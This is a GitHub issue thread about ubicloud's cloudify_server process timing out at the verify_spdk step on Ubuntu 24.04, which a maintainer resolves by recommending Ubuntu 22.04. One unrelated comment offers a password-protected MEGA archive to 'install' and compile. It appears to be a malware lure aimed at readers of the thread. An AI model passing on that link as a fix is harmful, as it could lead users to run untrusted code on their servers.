### ISSUE TITLE
verify_spdk  times out during cloudification

### ISSUE THREAD

**Issue by rlimberger** [ubicloud/ubicloud#1990]
I and trying to cloudify a Hetzer server running Ubuntu 24.04 LTS. 

I followed the [Ubicloud instructions](https://www.ubicloud.com/docs/quick-start/build-your-own-cloud) and the server rebooted as expected, now showing the Ubicloud welcome ascii art. However, the docker exec -it ubicloud-app ./demo/cloudify_server process eventually times out as verify_spdk is the last message printed.

```
ubicloud % docker exec -it ubicloud-app ./demo/cloudify_server
Enter hostname or IP address: <redacted>

1. Hetzner eu-central-h1
2. Hetzner eu-north-h1
3. Hetzner github-runners
4. Leaseweb us-east-a2
5. Leaseweb us-south-a13

Select provider and location [default: 1]:  1

Cloudifying '<redacted>' server for 'Hetzner eu-central-h1' 

Waiting public SSH keys

Add following public SSH key to '/root/.ssh/authorized_keys' on your machine

ssh-<redacted>

Press enter after you add the above SSH key to your machine

Waiting for server to be cloudified
2024-09-29 03:31:23 +0000 state: setup
2024-09-29 03:31:47 +0000 state: start
2024-09-29 03:31:49 +0000 state: install_gems
2024-09-29 03:31:53 +0000 state: wait_prep
2024-09-29 03:32:51 +0000 state: start
2024-09-29 03:32:55 +0000 state: install_spdk
2024-09-29 03:32:59 +0000 state: prep_reboot
2024-09-29 03:33:02 +0000 state: reboot
2024-09-29 03:34:04 +0000 state: verify_spdk
```

**Comment by SagarChandra07** [comment]
install this

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by furkansahin** [comment]
Hey @rlimberger , thanks for noting this. 
The SPDK setup we have at Ubicloud does not support Ubuntu 24.04 at the moment. If you switched to Ubuntu 22.04, it should work.
I will put that into our planning sheet so that we support Ubuntu 24.04 as well.
Best,
Furkan

**Comment by rlimberger** [comment]
Thank you, that resolved my issue.
